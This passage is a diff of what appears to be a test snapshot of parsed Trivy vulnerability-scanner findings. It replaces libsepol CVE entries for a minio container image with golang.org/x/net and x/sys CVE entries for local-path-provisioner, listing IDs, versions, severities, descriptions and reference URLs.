"https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36084", - "installedVersion": "3.1-1", - "packageName": "libsepol1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36084", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", - "https://linux.oracle.com/cve/CVE-2021-36084.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36084", - ], - }, - "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36084", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36084", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202209-26", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", + ], + }, + "category": "Vulnerability", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "avoid quadratic complexity in HPACK decoding", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + }, + { + "type": "URL", + "value": "https://go.dev/cl/468135", + }, + { + "type": "URL", + "value": "https://go.dev/cl/468295", + }, + { + "type": "URL", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36085", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-31525", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36085", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", - "https://linux.oracle.com/cve/CVE-2021-36085.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "https://access.redhat.com/security/cve/CVE-2021-31525", + "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", + "https://github.com/golang/go/issues/45710", + "https://go.dev/cl/313069", + "https://go.dev/issue/45710", + "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "https://linux.oracle.com/cve/CVE-2021-31525.html", + "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "https://pkg.go.dev/vuln/GO-2022-0236", + "https://security.gentoo.org/glsa/202208-02", + "https://www.cve.org/CVERecord?id=CVE-2021-31525", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36085", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36085", - }, - { - "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://avd.aquasec.com/nvd/cve-2021-31525", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://access.redhat.com/security/cve/CVE-2021-31525", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://github.com/golang/go/issues/45710", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://go.dev/cl/313069", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://go.dev/issue/45710", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "value": "https://pkg.go.dev/vuln/GO-2022-0236", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36086", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36086", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", - "https://linux.oracle.com/cve/CVE-2021-36086.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "use-after-free in cil_reset_classpermission()", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36087", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20200930185726-fdedc70b468f", + "packageName": "golang.org/x/sys", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36087", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", - "https://linux.oracle.com/cve/CVE-2021-36087.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36087", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36087", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": 